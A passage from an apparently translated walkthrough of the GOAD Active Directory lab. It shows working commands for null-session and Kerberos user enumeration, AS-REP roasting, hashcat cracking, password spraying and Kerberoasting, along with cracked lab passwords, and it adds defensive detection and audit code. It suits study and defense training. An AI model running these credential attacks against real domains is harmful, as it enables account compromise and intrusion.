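    found = parse_nmap(SAMPLE_NMAP)
    for h in found:
        print(f"{h.ip:<15} {domain_of(h):<28} {role(h):<6} smb2 signing: {h.smb2_signing}")
    print("SMB signing not required on:", ", ".join(signing_not_required(found)))
```

Run it against the full `full_scan_goad.nmap` file instead of the embedded sample and the table matches the cme list above; hosts that turn up in the "not required" list are the ones a defender should fix, since negotiable signing is what makes SMB relay possible.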

Collecting domain controller IPs

We can use the nslookup command to find the DC IPs.

An SRV record is a type of resource record supported in a DNS server's database; it records one simple piece of information: which computer provides which service.

SRV records are generally used when setting up Microsoft Active Directory. DNS can exist independently of Active Directory, but Active Directory needs DNS to function. For Active Directory to work properly, the DNS server must support service location (SRV) resource records, which map a service name to the name of the server providing it. Active Directory clients and domain controllers use SRV resource records to determine the IP addresses of domain controllers.

Query any host that runs DNS (e.g. 192.168.56.10) for the SRV record:

nslookup -type=srv _ldap._tcp.dc._msdcs.${domain} 192.168.56.10

You can see that for some results the answer is returned under Authoritative answers can be found from, which tells us that this host is the controller for that domain.
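To make concrete what nslookup is doing here, the following is an added example (not from the original WP or the GOAD project) that builds the DC-locator SRV query for a domain by hand, parses the SRV answer out of a DNS wire-format reply, and can send the query to a DNS server such as 192.168.56.10. The reply it parses offline is a constructed stand-in for a DC's answer, built by `build_srv_response`; the live path `query_dc_srv` is the same parser on a real UDP reply and is not exercised offline.

```python
import socket
import struct

SRV_TYPE, IN_CLASS = 33, 1


def dc_locator_name(domain: str) -> str:
    """DC locator record published by every DC of a domain (the name nslookup is asked for)."""
    return f"_ldap._tcp.dc._msdcs.{domain.rstrip('.')}"


def encode_name(name: str) -> bytes:
    """Wire-format name: length-prefixed labels terminated by a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        out += struct.pack("!B", len(raw)) + raw
    return out + b"\x00"


def build_srv_query(domain: str, txid: int = 0x1234) -> bytes:
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD set, one question
    return header + encode_name(dc_locator_name(domain)) + struct.pack("!HH", SRV_TYPE, IN_CLASS)


def decode_name(msg: bytes, offset: int):
    """Decode a name, following compression pointers; returns (name, offset after the field)."""
    labels, jumped, end = [], False, offset
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:          # compression pointer to an earlier name
            if not jumped:
                end = offset + 2
            jumped = True
            offset = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            continue
        if length == 0:
            offset += 1
            break
        labels.append(msg[offset + 1:offset + 1 + length].decode("ascii"))
        offset += 1 + length
    return ".".join(labels), (end if jumped else offset)


def parse_srv_response(msg: bytes):
    """Return [(priority, weight, port, target), ...] from the answer section."""
    _, flags, qd, an, _, _ = struct.unpack("!HHHHHH", msg[:12])
    if flags & 0x000F:                      # RCODE != 0, e.g. NXDOMAIN: this server does not know the domain
        return []
    offset = 12
    for _ in range(qd):                     # skip the echoed question
        _, offset = decode_name(msg, offset)
        offset += 4
    out = []
    for _ in range(an):
        _, offset = decode_name(msg, offset)
        rtype, _, _, rdlen = struct.unpack("!HHIH", msg[offset:offset + 10])
        offset += 10
        if rtype == SRV_TYPE:
            prio, weight, port = struct.unpack("!HHH", msg[offset:offset + 6])
            target, _ = decode_name(msg, offset + 6)
            out.append((prio, weight, port, target))
        offset += rdlen
    return out


def build_srv_response(query: bytes, answers, ttl: int = 600) -> bytes:
    """Constructed stand-in for a DC's reply so the example runs offline (uses a pointer to the question name)."""
    txid = struct.unpack("!H", query[:2])[0]
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, len(answers), 0, 0)  # QR + RD + RA, NOERROR
    body = b""
    for prio, weight, port, target in answers:
        rdata = struct.pack("!HHH", prio, weight, port) + encode_name(target)
        body += b"\xC0\x0C" + struct.pack("!HHIH", SRV_TYPE, IN_CLASS, ttl, len(rdata)) + rdata
    return header + query[12:] + body


def query_dc_srv(domain: str, server: str, timeout: float = 2.0):
    """Live path: send the query over UDP/53 to a DNS server such as 192.168.56.10 (not run offline)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_srv_query(domain), (server, 53))
        data, _ = s.recvfrom(4096)
    return parse_srv_response(data)


if __name__ == "__main__":
    q = build_srv_query("north.sevenkingdoms.local")
    # Constructed reply standing in for what the lab DNS would answer for the north domain
    r = build_srv_response(q, [(0, 100, 389, "winterfell.north.sevenkingdoms.local")])
    for prio, weight, port, target in parse_srv_response(r):
        print(f"{target}:{port} (priority {prio}, weight {weight})")
```

The target names that come back are exactly the hostnames that go into /etc/hosts in the next step; an empty list for a domain means the server you asked is not authoritative for it (or it is not an AD domain), which is the same signal the author reads from the nslookup output.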

Setting up /etc/hosts

# /etc/hosts
192.168.56.10   sevenkingdoms.local kingslanding.sevenkingdoms.local kingslanding
192.168.56.11   winterfell.north.sevenkingdoms.local north.sevenkingdoms.local winterfell
192.168.56.12   essos.local meereen.essos.local meereen
192.168.56.22   castelblack.north.sevenkingdoms.local castelblack
192.168.56.23   braavos.essos.local braavos

The original WP also configures Kerberos at this point, but I think that belongs later.

Getting usable users

Enumeration via anonymous sessions

We can first check whether a DC allows anonymous (null) sessions; if it does, we can directly obtain all users in the domain.

Presumably after some trial, WINTERFELL was found to allow anonymous sessions.

CME

crackmapexec smb 192.168.56.11 --users

Also via the anonymous session, we can obtain the DC's password policy:

crackmapexec smb 192.168.56.11 --pass-pol

enum4linux

Besides cme, enum4linux can also be used to get information from the DC.

enum4linux 192.168.56.11

As you can see, its information is very comprehensive:

Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon May 12 22:41:26 2025

 =========================================( Target Information )=========================================

Target ........... 192.168.56.11
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===========================( Enumerating Workgroup/Domain on 192.168.56.11 )===========================


[E] Can't find workgroup/domain



 ===============================( Nbtstat Information for 192.168.56.11 )===============================

Looking up status of 192.168.56.11
No reply from 192.168.56.11

 ===================================( Session Check on 192.168.56.11 )===================================


[+] Server 192.168.56.11 allows sessions using username '', password ''


 ================================( Getting domain SID for 192.168.56.11 )================================

Domain Name: NORTH
Domain Sid: S-1-5-21-1143549074-3139567753-3545395897

[+] Host is part of a domain (not a workgroup)


 ==================================( OS information on 192.168.56.11 )==================================


[E] Can't get OS info with smbclient


[+] Got OS info for 192.168.56.11 from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED


 =======================================( Users on 192.168.56.11 )=======================================

index: 0x18b2 RID: 0x456 acb: 0x00000210 Account: arya.stark    Name: (null)    Desc: Arya Stark
index: 0x18bd RID: 0x45b acb: 0x00010210 Account: brandon.stark Name: (null)    Desc: Brandon Stark
index: 0x16fa RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null)    Desc: Built-in account for guest access to the computer/domain
index: 0x18c1 RID: 0x45d acb: 0x00000210 Account: hodor Name: (null)    Desc: Brainless Giant
index: 0x18c7 RID: 0x460 acb: 0x00000210 Account: jeor.mormont  Name: (null)    Desc: Jeor Mormont
index: 0x18c3 RID: 0x45e acb: 0x00040210 Account: jon.snow      Name: (null)    Desc: Jon Snow
index: 0x18bf RID: 0x45c acb: 0x00000210 Account: rickon.stark  Name: (null)    Desc: Rickon Stark
index: 0x18c6 RID: 0x45f acb: 0x00000210 Account: samwell.tarly Name: (null)    Desc: Samwell Tarly (Password : Heartsbane)
index: 0x18bb RID: 0x45a acb: 0x00002210 Account: sansa.stark   Name: (null)    Desc: Sansa Stark
index: 0x18c8 RID: 0x461 acb: 0x00000210 Account: sql_svc       Name: (null)    Desc: sql service

user:[Guest] rid:[0x1f5]
user:[arya.stark] rid:[0x456]
user:[sansa.stark] rid:[0x45a]
user:[brandon.stark] rid:[0x45b]
user:[rickon.stark] rid:[0x45c]
user:[hodor] rid:[0x45d]
user:[jon.snow] rid:[0x45e]
user:[samwell.tarly] rid:[0x45f]
user:[jeor.mormont] rid:[0x460]
user:[sql_svc] rid:[0x461]

 =================================( Share Enumeration on 192.168.56.11 )=================================

do_connect: Connection to 192.168.56.11 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 192.168.56.11


 ===========================( Password Policy Information for 192.168.56.11 )===========================



[+] Attaching to 192.168.56.11 using a NULL share

[+] Trying protocol 139/SMB...

        [!] Protocol failed: Cannot request session (Called Name:192.168.56.11)

[+] Trying protocol 445/SMB...

[+] Found domain(s):

        [+] NORTH
        [+] Builtin

[+] Password Info for Domain: NORTH

        [+] Minimum password length: 5
        [+] Password history length: 24
        [+] Maximum password age: 311 days 2 minutes
        [+] Password Complexity Flags: 000000

                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 0

        [+] Minimum password age: 1 day 4 minutes
        [+] Reset Account Lockout Counter: 5 minutes
        [+] Locked Account Duration: 5 minutes
        [+] Account Lockout Threshold: 5
        [+] Forced Log off Time: Not Set



[+] Retieved partial password policy with rpcclient:


Password Complexity: Disabled
Minimum Password Length: 5


 ======================================( Groups on 192.168.56.11 )======================================


[+] Getting builtin groups:

group:[Guests] rid:[0x222]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[Storage Replica Administrators] rid:[0x246]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Users] rid:[0x221]

[+]  Getting builtin group memberships:

Group: IIS_IUSRS' (RID: 568) has member: Couldn't lookup SIDs
Group: Windows Authorization Access Group' (RID: 560) has member: Couldn't lookup SIDs
Group: Guests' (RID: 546) has member: Couldn't lookup SIDs
Group: Remote Desktop Users' (RID: 555) has member: Couldn't lookup SIDs
Group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: Couldn't lookup SIDs
Group: Users' (RID: 545) has member: Couldn't lookup SIDs

[+]  Getting local groups:

group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44e]
group:[AcrossTheSea] rid:[0x455]

[+]  Getting local group memberships:

Group: Denied RODC Password Replication Group' (RID: 572) has member: Couldn't lookup SIDs

[+]  Getting domain groups:

group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[DnsUpdateProxy] rid:[0x44f]
group:[Stark] rid:[0x452]
group:[Night Watch] rid:[0x453]
group:[Mormont] rid:[0x454]

[+]  Getting domain group memberships:

Group: 'Mormont' (RID: 1108) has member: NORTH\jeor.mormont
Group: 'Stark' (RID: 1106) has member: NORTH\arya.stark
Group: 'Stark' (RID: 1106) has member: NORTH\eddard.stark
Group: 'Stark' (RID: 1106) has member: NORTH\catelyn.stark
Group: 'Stark' (RID: 1106) has member: NORTH\robb.stark
Group: 'Stark' (RID: 1106) has member: NORTH\sansa.stark
Group: 'Stark' (RID: 1106) has member: NORTH\brandon.stark
Group: 'Stark' (RID: 1106) has member: NORTH\rickon.stark
Group: 'Stark' (RID: 1106) has member: NORTH\hodor
Group: 'Stark' (RID: 1106) has member: NORTH\jon.snow
Group: 'Domain Guests' (RID: 514) has member: NORTH\Guest
Group: 'Domain Computers' (RID: 515) has member: NORTH\CASTELBLACK$
Group: 'Night Watch' (RID: 1107) has member: NORTH\jon.snow
Group: 'Night Watch' (RID: 1107) has member: NORTH\samwell.tarly
Group: 'Night Watch' (RID: 1107) has member: NORTH\jeor.mormont
Group: 'Domain Users' (RID: 513) has member: NORTH\Administrator
Group: 'Domain Users' (RID: 513) has member: NORTH\vagrant
Group: 'Domain Users' (RID: 513) has member: NORTH\krbtgt
Group: 'Domain Users' (RID: 513) has member: NORTH\SEVENKINGDOMS$
Group: 'Domain Users' (RID: 513) has member: NORTH\arya.stark
Group: 'Domain Users' (RID: 513) has member: NORTH\eddard.stark
Group: 'Domain Users' (RID: 513) has member: NORTH\catelyn.stark
Group: 'Domain Users' (RID: 513) has member: NORTH\robb.stark
Group: 'Domain Users' (RID: 513) has member: NORTH\sansa.stark
Group: 'Domain Users' (RID: 513) has member: NORTH\brandon.stark
Group: 'Domain Users' (RID: 513) has member: NORTH\rickon.stark
Group: 'Domain Users' (RID: 513) has member: NORTH\hodor
Group: 'Domain Users' (RID: 513) has member: NORTH\jon.snow
Group: 'Domain Users' (RID: 513) has member: NORTH\samwell.tarly
Group: 'Domain Users' (RID: 513) has member: NORTH\jeor.mormont
Group: 'Domain Users' (RID: 513) has member: NORTH\sql_svc
Group: 'Group Policy Creator Owners' (RID: 520) has member: NORTH\Administrator

 ==================( Users on 192.168.56.11 via RID cycling (RIDS: 500-550,1000-1050) )==================


[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.


 ===============================( Getting printer info for 192.168.56.11 )===============================

do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED


enum4linux complete on Mon May 12 22:41:50 2025

RPC Call

We can also talk to the RPC service (port 135) directly with rpcclient to collect the same information:

rpcclient -U "NORTH\\" 192.168.56.11 -N

rpcclient $> enumdomusers

This output is somewhat incomplete, though (a few local accounts are missing), so the net tool can be used instead:

net rpc group members 'Domain Users' -W 'NORTH' -I '192.168.56.11' -U '%'

Wordlist enumeration

The direct listing methods above require the DC to allow anonymous access, which for security reasons very few DCs do. When it is not enabled we have to fall back on the crude approach: enumeration against a wordlist.

The original writeup applied a bit of social engineering when building its wordlist: GOAD is packed with Game of Thrones references (not that I have watched it), so the Game of Thrones cast was used as the wordlist.

The original writeup's wordlist apparently can no longer be generated, so I will just use the scan results directly. Enumeration is done with nmap again; note that port 88 is Kerberos, so what is really happening here is user enumeration through Kerberos:

nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='sevenkingdoms.local',userdb=got_users.txt" 192.168.56.10
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-13 14:59 HKT
Nmap scan report for 192.168.56.10
Host is up (0.00085s latency).

PORT   STATE SERVICE
88/tcp open  kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
|     [email protected]
|     [email protected]
|     [email protected]
|     [email protected]
|     [email protected]
|     [email protected]
|_    [email protected]

Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds

Enumerate the users of the essos.local domain the same way:

nmap -p 88 -script=krb5-enum-users --script-args="krb5-enum-users.realm='essos.local',userdb=got_users.txt" 192.168.56.12
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-13 14:56 HKT
Nmap scan report for 192.168.56.12
Host is up (0.00069s latency).

PORT   STATE SERVICE
88/tcp open  kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
|     [email protected]
|     [email protected]
|     [email protected]
|     [email protected]
|_    [email protected]

Nmap done: 1 IP address (1 host up) scanned in 0.36 seconds

This nmap script decides whether a user exists from the error code the KDC returns to its AS-REQ, so the enumeration does not increment badPwdCount (no password is ever sent). It is not silent, though: on the DC each probe for a non-existent name shows up as a failed 4768 event with result code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN), so a burst of those from one source is the signal a defender alerts on.

Obtaining user credentials

AS-REP Roast

The steps above gave us a set of valid users; now we need to try to obtain credentials for them.

First, save the users of north.sevenkingdoms.local to users.txt:

sql_svc
jeor.mormont
samwell.tarly
jon.snow
hodor
rickon.stark
brandon.stark
sansa.stark
robb.stark
catelyn.stark
eddard.stark
arya.stark
krbtgt
vagrant
Guest
Administrator

Use the GetNPUsers.py script from impacket/examples to carry out an AS-REP Roast attack:

$ python GetNPUsers.py north.sevenkingdoms.local/ -no-pass -usersfile ../../users.txt
Impacket v0.13.0.dev0+20250508.104819.fde4265a - Copyright Fortra, LLC and its affiliated companies

[-] User sql_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jeor.mormont doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User samwell.tarly doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jon.snow doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User hodor doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User rickon.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[email protected]:6747f2406f35b011c2bd3d5d170aa8d9$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
[-] User sansa.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User robb.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User catelyn.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User eddard.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User arya.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User vagrant doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set

Here we can see that the user brandon.stark has the UF_DONT_REQUIRE_PREAUTH flag set, and we successfully obtained a TGT response (AS-REP) for him; its encrypted part is derived from his password, which is what gets cracked next.

After saving the hash as brandon.stark.hash, we try to crack the password with hashcat:

 $ hashcat -m 18200 brandon.stark.hash /usr/share/wordlists/rockyou.txt

 ...
 [email protected]:6747f2406f35b011c2bd3d5d170aa8d9$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:iseedeadpeople

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: [email protected]
Time.Started.....: Mon May 19 16:07:13 2025 (0 secs)
Time.Estimated...: Mon May 19 16:07:13 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  4234.4 kH/s (1.44ms) @ Accel:1024 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 65536/14344385 (0.46%)
Rejected.........: 0/65536 (0.00%)
Restore.Point....: 49152/14344385 (0.34%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: truckin -> sabrina7

So this user's password is iseedeadpeople.

Password Spray

Now let's try to obtain some user credentials by password guessing (although I think this should be used sparingly in a real engagement: brute-force behaviour is easy to detect and easily locks out the accounts on the machine):

$ crackmapexec smb 192.168.56.11 -u users.txt -p users.txt --no-bruteforce

SMB         192.168.56.11   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         192.168.56.11   445    WINTERFELL       [-] north.sevenkingdoms.local\sql_svc:sql_svc STATUS_LOGON_FAILURE
SMB         192.168.56.11   445    WINTERFELL       [-] north.sevenkingdoms.local\jeor.mormont:jeor.mormont STATUS_LOGON_FAILURE
SMB         192.168.56.11   445    WINTERFELL       [-] north.sevenkingdoms.local\samwell.tarly:samwell.tarly STATUS_LOGON_FAILURE
SMB         192.168.56.11   445    WINTERFELL       [-] north.sevenkingdoms.local\jon.snow:jon.snow STATUS_LOGON_FAILURE
SMB         192.168.56.11   445    WINTERFELL       [+] north.sevenkingdoms.local\hodor:hodor

The --no-bruteforce option pairs the user list and the password list one-to-one instead of trying the full cross product.
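A defender-side view of the two noisy techniques in this part of the writeup, the Kerberos user enumeration of the "Wordlist enumeration" section and the password spray just above: this is an added example, not code from the writeup or from nmap or crackmapexec. It assumes a simplified pipe-delimited record layout for Windows Security events 4768 (Kerberos AS-REQ) and 4625 (failed logon); the log lines are constructed for the demo, and the thresholds are assumptions to tune per environment.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample records (not real captures). Assumed layout:
#   timestamp|event_id|account|source_ip|status
# with the Security event IDs the techniques above leave on a DC:
#   4768 Kerberos AS-REQ: status 0x6 = KDC_ERR_C_PRINCIPAL_UNKNOWN, 0x0 = success
#   4625 failed logon:    status 0xC000006D = bad user name or password
SAMPLE_LOG = """\
2025-05-13T14:58:50|4768|eddard.stark|192.168.56.50|0x0
2025-05-13T14:59:00|4768|tywin.lannister|192.168.56.100|0x6
2025-05-13T14:59:00|4768|jaime.lannister|192.168.56.100|0x6
2025-05-13T14:59:00|4768|cersei.lannister|192.168.56.100|0x6
2025-05-13T14:59:00|4768|robert.baratheon|192.168.56.100|0x6
2025-05-13T14:59:01|4768|joffrey.baratheon|192.168.56.100|0x6
2025-05-13T14:59:01|4768|renly.baratheon|192.168.56.100|0x6
2025-05-13T14:59:01|4768|stannis.baratheon|192.168.56.100|0x6
2025-05-13T14:59:01|4768|petyr.baelish|192.168.56.100|0x6
2025-05-13T14:59:01|4768|lord.varys|192.168.56.100|0x6
2025-05-13T14:59:02|4768|maester.pycelle|192.168.56.100|0x6
2025-05-13T14:59:02|4768|daenerys.targaryen|192.168.56.100|0x6
2025-05-13T14:59:02|4768|viserys.targaryen|192.168.56.100|0x6
2025-05-13T15:04:10|4625|arya.stark|192.168.56.50|0xC000006D
2025-05-13T15:04:25|4625|arya.stark|192.168.56.50|0xC000006D
2025-05-13T15:04:40|4625|arya.stark|192.168.56.50|0xC000006D
2025-05-13T15:05:00|4625|sql_svc|192.168.56.100|0xC000006D
2025-05-13T15:05:00|4625|jeor.mormont|192.168.56.100|0xC000006D
2025-05-13T15:05:01|4625|samwell.tarly|192.168.56.100|0xC000006D
2025-05-13T15:05:01|4625|jon.snow|192.168.56.100|0xC000006D
"""


def parse_log(text):
    """Parse the constructed pipe-delimited lines into dicts."""
    records = []
    for line in text.strip().splitlines():
        ts, event_id, account, src, status = line.split("|")
        records.append({"ts": datetime.fromisoformat(ts), "event_id": int(event_id),
                        "account": account.lower(), "src": src, "status": status})
    return records


def _accounts_per_source(records, window):
    """For each source IP, return a Counter of the accounts seen in the busiest
    `window` (sliding over that source's events sorted by time)."""
    by_src = defaultdict(list)
    for r in records:
        by_src[r["src"]].append(r)
    busiest = {}
    for src, recs in by_src.items():
        recs.sort(key=lambda r: r["ts"])
        start = 0
        for end in range(len(recs)):
            while recs[end]["ts"] - recs[start]["ts"] > window:
                start += 1
            names = Counter(r["account"] for r in recs[start:end + 1])
            if src not in busiest or len(names) > len(busiest[src]):
                busiest[src] = names
    return busiest


def detect_kerberos_enum(records, window=timedelta(minutes=1), min_unknown=10):
    """Kerberos user enumeration: one source asking the KDC about many different
    principals that do not exist (4768, result 0x6) in a short window.
    badPwdCount never moves, so this is the signal to watch instead."""
    probes = [r for r in records if r["event_id"] == 4768 and r["status"] == "0x6"]
    return {src: len(names) for src, names in _accounts_per_source(probes, window).items()
            if len(names) >= min_unknown}


def detect_password_spray(records, window=timedelta(minutes=5), min_accounts=4, max_per_account=2):
    """Password spray: one source failing against many distinct accounts with
    only a few attempts each (staying under the lockout threshold), which is
    what separates it from a user mistyping one password several times."""
    failures = [r for r in records if r["event_id"] == 4625]
    alerts = {}
    for src, names in _accounts_per_source(failures, window).items():
        if len(names) >= min_accounts and max(names.values()) <= max_per_account:
            alerts[src] = sorted(names)
    return alerts


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    print("kerberos enumeration:", detect_kerberos_enum(recs))
    print("password spray:", detect_password_spray(recs))
```

Both rules key on the source rather than the account, which is why the typo user arya.stark (three failures, one account) does not fire while the spray (four accounts, one failure each) does. The same breadth-over-depth logic is what makes --no-bruteforce style runs visible even when every account stays below its lockout counter.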

From the above we have now obtained three credentials:

  • samwell.tarly:Heartsbane (user description)
  • brandon.stark:iseedeadpeople (AS-REP Roasting)
  • hodor:hodor (Password Spray)

Further user enumeration

In the previous section we obtained some usable credentials, so we can now authenticate to the domain and query all of its users.

$ GetADUsers.py -all north.sevenkingdoms.local/brandon.stark:iseedeadpeople 

Impacket v0.13.0.dev0+20250508.104819.fde4265a - Copyright Fortra, LLC and its affiliated companies

[*] Querying north.sevenkingdoms.local for information about domain.
Name                  Email                           PasswordLastSet      LastLogon
--------------------  ------------------------------  -------------------  -------------------
Administrator                                         2025-05-11 16:12:59.940640  2025-05-11 18:05:54.579884
Guest                                                 <never>              <never>
vagrant                                               2021-05-12 19:38:55.922520  2025-05-11 19:08:06.996280
krbtgt                                                2025-05-11 16:42:39.983116  <never>
                                                      2025-05-11 16:52:40.599707  <never>
arya.stark                                            2025-05-11 17:08:02.241031  <never>
eddard.stark                                          2025-05-11 17:08:09.177013  2025-05-19 22:45:16.126595
catelyn.stark                                         2025-05-11 17:08:14.722538  <never>
robb.stark                                            2025-05-11 17:08:19.614742  2025-05-19 22:48:46.934108
sansa.stark                                           2025-05-11 17:08:24.136167  <never>
brandon.stark                                         2025-05-11 17:08:29.726649  2025-05-19 22:43:16.366471
rickon.stark                                          2025-05-11 17:08:35.360818  <never>
hodor                                                 2025-05-11 17:08:40.385286  2025-05-19 22:43:51.403368
jon.snow                                              2025-05-11 17:08:45.268181  <never>
samwell.tarly                                         2025-05-11 17:08:52.140103  <never>
jeor.mormont                                          2025-05-11 17:08:56.230651  <never>
sql_svc                                               2025-05-11 17:09:01.025301  2025-05-11 18:25:14.985051

Besides Impacket, we can also write the LDAP query by hand:

$ ldapsearch -H ldap://192.168.56.11 -D "[email protected]" -w iseedeadpeople -b 'DC=north,DC=sevenkingdoms,DC=local' "(&(objectCategory=person)(objectClass=user))" |grep 'distinguishedName:'

distinguishedName: CN=Administrator,CN=Users,DC=north,DC=sevenkingdoms,DC=loca
distinguishedName: CN=Guest,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=vagrant,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=krbtgt,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=SEVENKINGDOMS$,CN=Users,DC=north,DC=sevenkingdoms,DC=loc
distinguishedName: CN=arya.stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=eddard.stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=catelyn.stark,CN=Users,DC=north,DC=sevenkingdoms,DC=loca
distinguishedName: CN=robb.stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=sansa.stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=brandon.stark,CN=Users,DC=north,DC=sevenkingdoms,DC=loca
distinguishedName: CN=rickon.stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=hodor,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=jon.snow,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=samwell.tarly,CN=Users,DC=north,DC=sevenkingdoms,DC=loca
distinguishedName: CN=jeor.mormont,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=sql_svc,CN=Users,DC=north,DC=sevenkingdoms,DC=local

Because of the domain trust, a user of north.sevenkingdoms.local can also enumerate the users of other domains, for example sevenkingdoms.local:

$ ldapsearch -H ldap://192.168.56.10 -D "[email protected]" -w iseedeadpeople -b 'DC=sevenkingdoms,DC=local' "(&(objectCategory=person)(objectClass=user))" | grep cn

cn: Administrator
cn: Guest
cn: vagrant
cn: krbtgt
cn: NORTH$
cn: ESSOS$
cn: tywin.lannister
cn: jaime.lannister
cn: cersei.lannister
cn: tyron.lannister
cn: robert.baratheon
cn: joffrey.baratheon
cn: renly.baratheon
cn: stannis.baratheon
cn: petyer.baelish
cn: lord.varys
cn: maester.pycelle

Kerberoasting

At this point we can also try Kerberoasting. First find the accounts with an SPN and request their tickets:

$ GetUserSPNs.py -request -dc-ip 192.168.56.11 north.sevenkingdoms.local/brandon.stark:iseedeadpeople -outputfile kerberoasting.hashes

Impacket saves the tickets to kerberoasting.hashes; then we crack them with hashcat:

$ hashcat -m 13100 --force -a 0 kerberoasting.hashes /usr/share/wordlists/rockyou.txt

We recover the password of the jon.snow account: iknownothing.
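The same LDAP query style used above can audit a domain for the two weaknesses exploited in the AS-REP Roast and Kerberoasting sections. The following is an added example, not part of the writeup or of Impacket: it decodes the userAccountControl bits that make an account roastable, builds the ldapsearch filters a defender can run against the DC to find such accounts, and applies the equivalent checks in Python. The directory entries are constructed for the demo (the SPN values and flag combinations are assumptions, not a dump of GOAD).

```python
# userAccountControl bits (documented Windows values).
UAC_FLAGS = {
    "ACCOUNTDISABLE": 0x0002,
    "PASSWD_NOTREQD": 0x0020,
    "NORMAL_ACCOUNT": 0x0200,
    "WORKSTATION_TRUST_ACCOUNT": 0x1000,
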